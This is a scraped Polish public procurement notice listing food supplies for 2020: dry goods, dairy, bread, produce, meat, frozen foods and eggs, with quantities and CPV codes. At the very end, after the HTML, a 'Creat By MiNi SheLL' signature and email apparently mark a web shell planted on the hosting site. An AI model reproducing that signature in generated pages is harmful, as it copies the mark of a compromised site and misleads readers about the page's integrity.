1. Makaron nitki 250 g (4 jajeczny) - 180kg2. Makaron świderki po 2,5 kg z mąki durum - 400kg3. Makaron kolanka po 2,5 kg z mąki durum - 100kg4. Woda mineralna gazowana - butelki 0,5 l - 600l5. Woda mineralna gazowana - butelki 1,5 l - 1500l6. Woda mineralna niegazowana - butelki 0,5 l - 400l7. Sól po 1 kg	- 600kg8. Pasztet z drobiu 160g (typu prochowicki) -400kg9. Pasztet z drobiu 300g (typu prochowicki) - 350kg10. Konserwy mięsne wieprzowe 300g - 350kg11. Pasztet wieprzowy 500g - 50kg12. Ogórek konserwowy po 900 g - 400kg13. Mąka pszenna typ 500 po 1 kg - 200kg14. Mąka tortowa typ 450 po 1 kg - 600kg15. Mąka ziemniaczana po 1 kg - 50kg16. Kasza manna po 1 kg	- 200kg17. Kasza jęczmienna po 1 kg	- 300kg18. Kasza kukurydziana po 0,5 kg - 50kg19. Cukier - wyrób polski - Kategoria I po 1 kg	- 3600kg20. Cukier puder po 0,5 kg - 20kg21. Groszek konserwowy po 400 g - 200kg22. Musztarda po 1 kg - 80kg23. Ocet po 1 l	- 120l24. Olej roślinny (opak. 1 l) - 200l25. Olej roślinny (opak. 3 l) - 300l26. Olej słonecznikowy (opak. 1 l) - 120l27. Miód naturalny po 900 g- PSZCZELI - 100kg28. Dżemy po 280 g - 280kg29. Powidła śliwkowe po 300g - 100kg30. Marmolada wieloowocowa po 1 kg - 60kg31. Masa makowa po 850 g - 20kg32. Brzoskwinie w puszce po 850 g - 20kg33. Wiórki kokosowe po 100 g - 5kg34. Rodzynki po 500 g - 10kg35. Cukier waniliowy po 1 kg - 5kg36. Kwasek cytrynowy po 1 kg - 5kg37. Proszek do pieczenia po 1 kg - 5kg38. Żelatyna po 1 kg - 10kg39. Konserwa makrela w pomidorach po 170 g - 180kg40. Konserwa makrela w oleju po 170 g - 160kg41. Konserwa szprot podwędzany po 170 g - 30kg42. Pieczarki marynowane po 850 g - 70kg43. Płatki kukurydziane po 500 g - 120kg44. Płatki owsiane błyskawiczne po 400 g - 80kg45. Płatki jęczmienne błyskawiczne po 400 g - 30kg46. Ananasy w puszce po 500 g - 30kg47. Napoje owocowe różne gazowane po 1,5 l - 180szt.48. Napoje owocowe różne niegazowane po 1,5 l - 180szt.49. Aromaty do ciast różne po 9 ml - 30szt.50. Soda oczyszczona po 500g - 5kg51. Fasola konserwowa czerwona 400g - 70kg52. Cieciorka konserwowa 400g - 80kg53. Majonez 700 g typu Winiary - 600kg54. Oranżada różna po 1,5 l - 180szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15800000-6, 15600000-4, 15400000-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Nabiał i mleko</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej określonych artykułów: 1. Ser biały półtłusty - 1200kg2. Ser topiony kostka kremowy 100g - 400kg3. Serek homogenizowany po 150 g typu Danio - 600kg4. Śmietana 18% - 800l5. Śmietana 30% - 50l6. Jogurt owocowy po 115 g typu Danon - 500szt.7. Jogurt naturalny po 150 g min. 3% tłuszczu w 100g produktu - 2500szt.8. Jogurt owocowy po 150 g typu Jogobella - 5000szt.9. Masło extra min. 82% tłuszczu zwierzęcego (osełka po 100g) - 200kg10. Masło extra min 82% tłuszczu zwierzęcego pakowane po 1 kg - 50kg11. Masło smakowe typu smaksełko po 100g - 60kg12. Margaryna z masłem do smarowania pieczywa min 5% masła - 900kg13. Margaryna do smarowania pieczywa typu Śniadaniowa, Smakowita maślany smak - 900kg14. Ser żółty (typu gouda) - 150kg15. Ser żółty (typu salami) - 400kg16. Ser żółty typu dziurawiec - 200kg17. Ser żółty typu morski - 50kg18. Ser żółty EDAMSKI - 50kg19. Ser żółty dziurawiec typu RYCKI - 50kg20. Ser żółty typu rolada ustrzycka - 150kg21. Ser żółty wędzony - 50kg22. Margaryna do pieczenia typu KASIA - 100kg23. Margaryna mleczna - 350kg24. Mleko 1l 2% tłuszczu - 6000l25. Maślanka 1l - 200l26. Kefir 380g - 2000szt.27. Serek wiejski 150g - 2000szt.28. Serek kanapkowy po 150 g - 300szt.29. Serek typu mój ulubiony po 450 g - 200szt.30. Deser ryżowy po 150 g - 300szt.31. Deser - kaszka po 150 g - 300szt.32. Deser - serniczek po 150 g - 300szt.33. Serek typu mój ulubiony 200 g - 450szt.34. Ser biały mielony 1 kg - 350kg35. Serek kanapkowy typu Łaciaty 135 g (różne smaki) - 600szt.36. Serek typu Almette 150 g - 240szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15500000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Pieczywo</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej określonych artykułów:1. Chleb zwykły krojony 600 g - 7000kg2. Chleb z orkiszem krojony 500 g - 350kg3. Chleb typu FITNNESS krojony 500 g - 350kg4. Chleb IG dla diabetyków 500 g - 350kg5. Chleb żytni razowy ze słonecznikiem 500 g - 350kg6. Chleb graham 500 g - 350kg7. Bułka pszenna wrocławska krojona 400 g - 5000kg8. Bułka mała pszenne po 50g - 13000szt.9. Bułka tarta - 100kg10. Bułka słodka z serem 100g - 2500szt.11. Bułka słodka z marmoladą 100g - 1500szt.12. Bułka słodka z jagodami 100g - 500szt.13. Pączki z marmoladą - 200szt.14. Pączki z nadzieniem różanym	- 200szt.15. Rogal zwykły po 90 g - 2000szt.16. Rogal maślany po 50 g - 7000szt.17. Bułka maślana 90g - 2000szt.18. Ciasto – sernik - 100kg19. Ciasto - makowiec - 100kg20. Ciasto - jabłecznik - 100kg<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15811000-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Warzywa i owoce</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej określonych artykułów:1. Burak czerwony - 800kg2. Cebula - 600kg3. Marchew - 2000kg4. Seler - 250kg5. Ziemniaki młode - 4000kg6. Ziemniaki - 11000kg7. Ogórek świeży od 01.01.2020 do 30.06.2020 i od 01.11.2020 do 31.12.2020 - 4000kg8. Ogórek świeży od 01.07.2020 do 31.10.2020 - 6000kg9. Ogórek małosolny - 200kg10. Ogórek kiszony - 300kg11. Kapusta pekińska - 150kg12. Kapusta kiszona - 800kg13. Kapusta biała młoda - 500szt.14. Kapusta biała - 400kg15. Kapusta włoska - 50szt.16. Kapusta czerwona - 120kg17. Sałata zielona - 1300szt.18. Kalafior świeży - 150szt.19. Koper świeży - 1500pęczek20. Pietruszka natka świeża - 1500pęczek21. Jabłka - 4000kg22. Pomidory świeże od 01.01.2020 do 30.06.2020 i od 01.11.2020 do 31.12.2020 - 800kg23. Pomidory świeże od 01.07.2020 do 31.10.2020 - 1000kg24. Pomidor malinowy od 01.07.2020 do 31.10.2020 - 200kg25. Szczypior - 1500pęczek26. Czosnek krajowy - 400szt.27. Pietruszka korzeń - 250kg28. Por - 250kg29. Cytryna - 500kg30. Groch łuskany po 5 kg - 250kg31. Fasola Jasiek po 500 g - 150kg32. Orzech włoski łuskany - 5kg33. Rzodkiewka - 2500pęczek34. Rabarbar - 30kg35. Botwina - 200pęczek36. Brokuł - 50szt.37. Fasolka szparagowa żółta od 01.07.2020 do 31.10.2020 - 50kg38. Fasolka szparagowa zielona od 01.07.2020 do 31.10.2020 - 100kg39. Sałata lodowa - 100szt.40. Pieczarka świeża - 300kg<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Mięso i wyroby wędliniarskie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej określonych artykułów:1. Filet z piersi kurczaka - 300kg2. Uda z kurczaka z obciętym grzbietem - 900kg3. Skrzydełko z kurczaka - 50kg4. Porcja rosołowa z kurczaka - 1500kg5. Kurczak świeży - 600kg6. Udziec z indyka b/k - 200kg7. Wątroba wieprzowa - 250kg8. Wołowina - pręga b/k - 50kg9. Wołowina - ligawa b/k - 50kg10. Wołowina b/k pieczeniowa - 100kg11. Wieprzowina - golonka tylna - 50kg12. Wieprzowina - szynka b/k - 800kg13. Wieprzowina - łopatka b/k i bez tłuszczu - 150kg14. Wieprzowina - karkówka b/k - 500kg15. Wieprzowina - biodrówka b/k - 50kg16. Wieprzowina - pachwina - 50kg17. Wieprzowina - nóżki	- 50kg18. Wieprzowina - przedgolonki - 50kg19. Wieprzowina-schab b/k - 500kg20. Żeberka wieprzowe trójkąty - 90kg21. Wieprzowina - kości schabowe -150kg22. Parówka z szynki - 100kg23. Polędwica drobiowa - 200kg24. Polędwica z warzywami - 200kg25. Kiełbasa parówkowa serdelki - 500kg26. Kiełbasa śląska- 200kg27. Kiełbasa szynkowa - 100kg28. Kiełbasa szynkowa drobiowa - 150kg29. Kiełbasa wiejska - 50kg30. Kiełbasa mielonka - 70kg31. Kiełbasa zwyczajna - 600kg32. Kiełbasa krakowska - 200kg33. Kiełbasa mortadela - 150kg34. Kiełbasa piwna - 30kg35. Kiełbasa biała parzona - 80kg36. Kiełbasa biała surowa - 30kg37. Kiełbasa żywiecka - 150kg38. Kiełbasa golonkowa - 30kg39. Kiełbasa jałowcowa - 80kg40. Schab wędzony - 50kg41. Schab pieczony - 50kg42. Polędwica sopocka - 200kg43. Ogonówka wędzona - 50kg44. Baleron - 50kg45. Pierś wędzona z indyka - 30kg46. Filet z piersi indyka - 50kg47. Boczek surowy - 120kg48. Boczek wędzony parzony - 80kg49. Boczek faszerowany - 30kg50. Rolada boczkowa - 30kg51. Szynka gotowana - 150kg52. Szynka typu z pieca	- 60kg53. Szynka typu krucha - 60kg54. Szynka drobiowa prasowana - 50kg55. Salceson drobiowy z kurczaka - 100kg56. Salceson drobiowy z indyka - 100kg57. Salceson wieprzowy włoski - 100kg58. Kaszanka z podrobami - 300kg59. Pieczeń wieprzowa - 80kg60. Pieczeń a’la kaczka - 40kg61. Pasztet zapiekany - 150kg62. Pasztetowa drobiowa - 200kg63. Słonina świeża bez skóry - 120kg64. Żołądki drobiowe świeże - 40kg65. Żołądki z indyka świeże - 40kg66. Kości wędzone wieprzowe - 150kg67. Pachwina wędzona - 30kg68. Szynka konserwowa prasowana - 150kg69. Kiełbasa salami - 10kg70. Kiełbasa ze świniobicia - 20kg71. Kabanosy wieprzowe - 15kg72. Kabanosy drobiowe - 15kg73. Kiełbasa biała z szynki - 50kg74. Parówka z fileta - 50kg75. Pasztet borowikowy - 50kg76. Pasztetowa wędzona - 50kg77. Kiełbasa wieprzowa z cielęciną - 30kg78. Kiełbasa geesowska - 30kg79. Kiełbasa myśliwska - 20kg<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15110000-2, 15130000-8<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Ryby, morożonki i przetwory warzywno - owocowe</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej określonych artykułów:1. Filet z dorsza mrożony SHP, bez glazury - 500kg2. Miruna mrożona - filet SHP, bez glazury - 500kg3. Śledź a’la Matjas - 300kg4. Śledź po kaszubsku - 50kg5. Śledź po wiejsku - 150kg6. Pyzy z mięsem - 320kg7. Pyzy ziemniaczane - 200kg8. Knedle z truskawkami	- 240kg9. Mrożonka wiosenna 7 skład. - 500kg10. Mrożonka włoszczyzna paski - 1000kg11. Mrożonka bukiet warzyw - 400kg12. Mrożonka kompotowa - 500kg13. Kalafior mrożony - 100kg14. Truskawka mrożona - 80kg15. Fasola mrożona szparagowa - 300kg16. Lody różne na patyku po 50 ml - 300szt.17. Lody różne na patyku po 110 ml - 450szt.18. Lody rożne rożek po 110 ml - 300szt.19. Lody różne w kubku po 200 ml - 150szt.20. Lody różne po 5 l - 50l21. Pierogi z serem - 120kg22. Pierogi ruskie - 120kg23. Tłuszcz FRYTURA - 30kg24. Szczaw konserwowy -	40kg25. Jabłka prażone "szarlotka" - 300kg26. Margaryna w płynie po 3,7 l - 15szt.27. Ćwiartka z kurczaka mrożona	- 360kg28. Czarna porzeczka mrożona - 100kg29. Kluski śląskie z dziurą - 120kg30. Mrożone leczo - 120kg31. Malina mrożona - 80kg32. Szpinak rozdrobniony - 50kg33. Koncentrat owocowy po 5 l (Kanister) bez syntetycznych barwników i substancji słodzących - 20szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15200000-0, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>Jaja</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej określonych artykułów:1. Jaja kurze „L” - 40000szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03142500-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com